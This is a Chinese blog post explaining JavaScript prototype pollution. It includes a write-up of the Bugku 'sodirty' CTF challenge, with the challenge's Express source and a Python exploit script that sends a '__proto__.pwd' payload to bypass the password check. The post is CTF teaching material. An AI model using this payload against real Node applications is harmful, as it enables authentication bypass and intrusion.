Javascript Prototype污染攻击(原型链污染,Bugku-web-sodirty wp)

最新推荐文章于 2024-04-08 20:03:09 发布
最新推荐文章于 2024-04-08 20:03:09 发布
阅读量1.1k 收藏 9
点赞数 4
分类专栏: 网络安全 Bugku CTF 学习记录 文章标签: javascript 网络安全 信息安全 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bin789456/article/details/119450359
版权

prototype

它表示原型,样本,标准
在javascript中,你使用构造函数时会创建一些属性和方法。
在构造方法时,你书写了函数的内容,那么,当你每创建一次对象时就会执行一次函数内容并将方法绑定在新的对象上。
如果你希望早创建类时仅创建一次该方法,同时绑定在“类”上,也就是任何实例化对象都可以直接访问该方法,当然你通过类也可以,并且只有一份。你就需要使用prototype

类名.prototype.方法名 = function 方法名() {函数内容}

这样就能够仅创建一份了。

虽然任何实例化对象都可以使用到这个方法,但是如果你想访问到那个唯一的一份函数,由于绑定在“类”上,你要通过“类”来访问到那个唯一的一份(关键字为prototype),如果你坚持要使用对象来访问到那个唯一的一份,你还需另外的关键字( __ prototype __ )

也就是说:

foo.__proto__ == Foo.prototype

总结:

1.prototype是一个类的属性,所有类对象在实例化的时候将会拥有prototype中的属性和方法
2.一个对象的__proto__属性,指向这个对象所在的类的prototype属性

原型链继承

javascript是通过原型链来进行继承的。

function Father() {
    this.first_name = 'Donald'
    this.last_name = 'Trump'
}

function Son() {
    this.first_name = 'Melania'
}

Son.prototype = new Father()

let son = new Son()
console.log(`Name: ${son.first_name} ${son.last_name}`)

输出结果为:

Name: Melania Trump

总结一下,对于对象son,在调用son.last_name的时候,实际上JavaScript引擎会进行如下操作:

1.在对象son中寻找last_name
2.如果找不到,则在son.__proto__中寻找last_name
3.如果仍然找不到,则继续在son.proto.__proto__中寻找last_name
4.依次寻找,直到找到null结束。比如,Object.prototype的__proto__就是null

就像是链条一样。

原型链污染

foo.__proto__指向的是Foo类的prototype。那么,如果我们修改了foo.__proto__中的值,就可以修改Foo类。

那么,在一个应用中,如果攻击者控制并修改了一个对象的原型,那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是原型链污染。

原型链污染常见情况和条件

我们思考一下,哪些情况下我们可以设置__proto__的值呢?其实找找能够控制数组(对象)的“键名”的操作即可:

1.对象merge
2.对象clone(其实内核就是将待操作的对象merge到一个空对象中)

例如:

function merge(target, source) {
    for (let key in source) {
        if (key in source && key in target) {
            merge(target[key], source[key])
        } else {
            target[key] = source[key]
        }
    }
}

let o1 = {}
let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
merge(o1, o2)
console.log(o1.a, o1.b)

o3 = {}
console.log(o3.b)

o3也具有b属性,说明Object已经被污染。

merge操作是最常见可能控制键名的操作,也最能被原型链攻击,很多常见的库都存在这个问题。

上述知识部分参考链接:
https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html#0x01-prototype__proto__

例题:Bugku-web-sodirty

打开题目后仅有一个注册按键,点击后显示创建成功。
首先用后台工具扫描,御剑、dirsearch、dirmap都可以。
扫出一个www.zip文件
在这里插入图片描述
打开就是后端源码,搜索以下’flag’或者"index"关键字。
在这里插入图片描述
进入index.js,得到:

var express = require('express');
const setFn = require('set-value');
var router = express.Router();


const Admin = {
    "password":process.env.password?process.env.password:"password"
}


router.post("/getflag", function (req, res, next) {
    if (req.body.password === undefined || req.body.password === req.session.challenger.password){
        res.send("登录失败");
    }else{
        if(req.session.challenger.age > 79){
            res.send("糟老头子坏滴很");
        }
        let key = req.body.key.toString();
        let password = req.body.password.toString();
        if(Admin[key] === password){
            res.send(process.env.flag ? process.env.flag : "flag{test}");
        }else {
            res.send("密码错误,请使用管理员用户名登录.");
        }
    }

});
router.get('/reg', function (req, res, next) {
    req.session.challenger = {
        "username": "user",
        "password": "pass",
        "age": 80
    }
    res.send("用户创建成功!");
});

router.get('/', function (req, res, next) {
    res.redirect('index');
});
router.get('/index', function (req, res, next) {
    res.send('<title>BUGKU-登录</title><h1>前端被炒了<br><br><br><a href="./reg">注册</a>');
});
router.post("/update", function (req, res, next) {
    if(req.session.challenger === undefined){
        res.redirect('/reg');
    }else{
        if (req.body.attrkey === undefined || req.body.attrval === undefined) {
            res.send("传参有误");
        }else {
            let key = req.body.attrkey.toString();
            let value = req.body.attrval.toString();
            setFn(req.session.challenger, key, value);
            res.send("修改成功");
        }
    }
});

module.exports = router;

你可以知道:
1.对应网页有着不同功能,/reg能够默认创建一个字典,/update能够修改新的数据,/getflag是取得flag的地方。

2.如果你要进行修改,你需要:

首先要有req.session.challenger 
用attrkey,attrval以post的形式传参,传参的结果以键值对的形式存在。

3.如果要取得flag,你需要:

post传参
修改password
age参数小于79
admin中存在完好键值对

思路:满足其他条件的同时,使用原型链污染,让Object对象有一个属性,这样就可以利用那个属性进行登录。

脚本参考:

import requests
import random
s = requests.session() #保持会话
def reg(url):
    url=url+"reg"
    r=s.get(url)
    print(r.text)

def update(url,data):
    url=url+"update"
    print(url)
    r=s.post(url,data=data)
    print(r.text)
    
def getflag(url,data):
    url=url+"getflag"
    r=s.post(url,data=data)
    print(r.text)

url="http://114.67.246.176:12965/"
reg(url)// 先取得req.session.changer
data={"attrkey":"age","attrval":"40"}
update(url,data)//post对年龄进行更新
data={"attrkey":"__proto__.pwd","attrval":"222"}
update(url,data)//原型链污染,Object有了这样一个属性
data={"password":"222","key":"pwd"}
getflag(url,data)//利用污染的进行登录
sayo.
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
JavaScript原型污染
Elite的博客
09-02 564
JS原型污染是指在JavaScript中由于原型链的特性,攻击者可以修改对象的原型,从而影响到所有该对象的实例,甚至全局范围内的对象。原型污染可能导致代码执行漏洞和安全问题
set-value:使用点符号设置对象上的嵌套属性
05-12
设定值 使用点表示法在对象上设置嵌套属性。 请考虑关注该项目的作者 ,并考虑为该项目以显示您的 :red_heart: 和支持。 安装 使用安装(需要 > = 11.0): $ npm install --save set-value 小心! 至3.0.1版或更高版本,该版本中修复了一个严重错误。 用法 const set = require ( 'set-value' ) ; const obj = { } ; set ( obj , 'a.b.c' , 'd' ) ; console . log ( obj ) ; //=> { a: { b: { c: 'd' } } } 参量 签名: set ( object , property_path , value [ , options ] ) ; object {Object} :要在其上设置value的对象 path {String | Sy
javascript原型污染
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
11-13 401
javascript中,如果攻击者通过某种手段修改 JavaScript 对象的原型prototype),那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是原型污染
bugku sodirty
plant1234的博客
03-28 3447
sodirty 这是一道简单的js原型污染的题目 了解JavaScript JavaScript一切皆对象,所有先了解JS对象 var obj ={} 创建obj这个对象,并没有赋予他任何属性或者方法,但是他会具有一些内置属性和方法,像__proto__,constructor,toString等. 但obj对象会继承__proto__的原型连接,拥有对象的方法 同时js对象的继承也是依赖__proto__所以不注意就会子类会和父类 共享一个属性地址。 这样修可以通过__proto__修改子类属性就会修
bugku sodirty ——web安全ctf题目解析
最新发布
weixin_54361902的博客
04-08 221
通过代码发现获取flag需要注意“/getflag”的验证,要先传两个参数:key、password,并且对用户字典中的age进行判断,如果大于79则会判断为失败。然后Admin[key]需要等于password,其中passwod是我们可以操控的 而Admin[key] 我们不知道。然后在seay审计系统打开index.js查看源代码(这里用idea也行随便用哪个打开来看就行了-_-)因为age是一个已经存在的变量,所以可以用post传参去覆盖。发现set-value,判断存在js原型污染
渗透攻击漏洞——原型污染
qq_44640313的博客
10-24 623
简单认识原型污染
【网络安全系列】JavaScript原型污染攻击总结
读万卷书,行万里路。
03-13 1714
文章目录0 前言1 原理2 利用 0 前言 原型污染,是 NodeJs 中常见的漏洞,在做 antCTF 时也遇到的原型污染题目,在此记录自己学习原型污染的过程。 1 原理 0x01 问:原型链有什么作用? 用来做继承,也就是基于原有的代码做一定的修改。下面是一个使用原型链实现继承的案例: function Parent () { this.name = 'kevin'; } Parent.prototype.getName = function () { console.log(t
[已解决] npm install xlsx报错 1 high severity vulnerability, 使用npm audit fix --force,显示No fix available
smiledawen的博客
07-31 2585
出现这个问题,是因为本地的node版本不符合xlsx插件需求。我的xlsx版本为0.18.5,node版本为18,应下载node14.换了个电脑,pull下来项目后,npm install 报错。
二十九、bugku sodirty
山兔的博客
09-05 498
发现只有一个注册的跳转链接,点击试试。 查看一下源代码,也没有发现什么。 御剑一下看看有没有备份文件,找到了www.zip的备份文件,下载下来看看。 直接搜索index.js得到源代码,发现set-value,判断存在js原型污染 var express = require('express'); const setFn = require('set-value'); //set-value,判断存在js原型污染 var router = express.Router(); c
Bugku WEB sodirty
qq_41696858的博客
07-10 1103
其实还是源码分析 dirsearch扫路径,发现有www备份,下载下来肯定是源码分析 文件有点多 more ./*|grep flag一个一个文件夹找,在router目录下找到index.js找到flag相关代码,后来查阅资料发现node.js里面router是根据路由去分模块 就相当java里的spring mvc直接跟用户交互用来寻找功能函数的框架 查看源码: var express = require('express'); const setFn = require('set-value'); va
浅谈原型污染
GuoZebin的博客
07-23 1708
漏洞原因 其实漏洞很简单,举一个例子:lodash 中 defaultsDeep 方法, _.defaultsDeep({ 'a': { 'b': 2 } }, { 'a': { 'b': 1, 'c': 3 } }) 输出: { 'a': { 'b': 2, 'c': 3 } } 如上例,该方法: 分配来源对象(该方法的第二个参数)的可枚举属性到目标对象(该方法的第一个参数)...
JavaScript_prototype_pollution_attack_in_NodeJS.pdf
02-01
高清版JavaScript_prototype_pollution_attack_in_NodeJS.pdf电子书,欢迎下载,或者您不想下载也可以去我的博客主页加群获取。
跟我学习javascriptprototype原型原型
10-23
跟我学习javascriptprototype原型原型链,感兴趣的小伙伴们可以参考一下
javascript prototype 原型
10-30
prototype源自法语,软件界的标准翻译为“原型”,代表事物的初始形态,也含有模型和样板的意义。
JavaScript中的原型prototype介绍
10-24
主要介绍了JavaScript中的原型prototype介绍,本文讲解了访问原型对象的3种方法,判断两个对象间是否存在原型链关系的方法等,需要的朋友可以参考下
如何快速修复 NPM audit 安全问题
MichaelAn的博客
08-30 475
问题描述:一个老前端项目中,npm audit 反馈 Dependencies 中反馈了不少安全问题,有很多的 high 或者 critical 问题需要修复。项目简介:大约是5年前的项目,react 版本是 16, webpack 是 3 版本,axios 是 0.x 版本。当时使用 create-react-app 初始化项目,后期经过 npm eject 暴露了配置并更改过。现在5年过去了,这些第三方库很多存在安全问题需要修复。
原型链和JSON
HH_beibei的博客
01-10 169
封装可以隐藏对象的实现细节,使得对象的行为看起来更加简单和清晰。我们可以通过修改函数的原型对象来定义继承关系,并在原型对象上定义方法和属性,这些方法和属性会被所有从这个函数通过原型继承创建的对象继承。JavaScript原型链是一种对象继承机制,它使得一个对象可以从另一个对象继承属性,在JavaScript中,每个对象都有一个prototype属性,指向另一个对象,这个对象的属性可以被继承。原型污染指的是在原型对象上添加大量的属性或方法,这些属性和方法会被所有从这个原型对象通过原型继承创建的对象所继承。
原型污染
m0_62422842的博客
06-06 2223
原型污染是一个关于前端js的相关漏洞,原型污染可拆分为两部分,什么是原型链,又如何进行污染
ctfshow 原型污染
10-14
原型污染是一种攻击方式,通过修改目标对象的原型链来实现攻击目的。攻击者可以通过修改原型链来篡改对象的属性或方法,从而达到攻击的目的。 例如,攻击者可以通过修改Object.prototype污染整个JavaScript环境...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值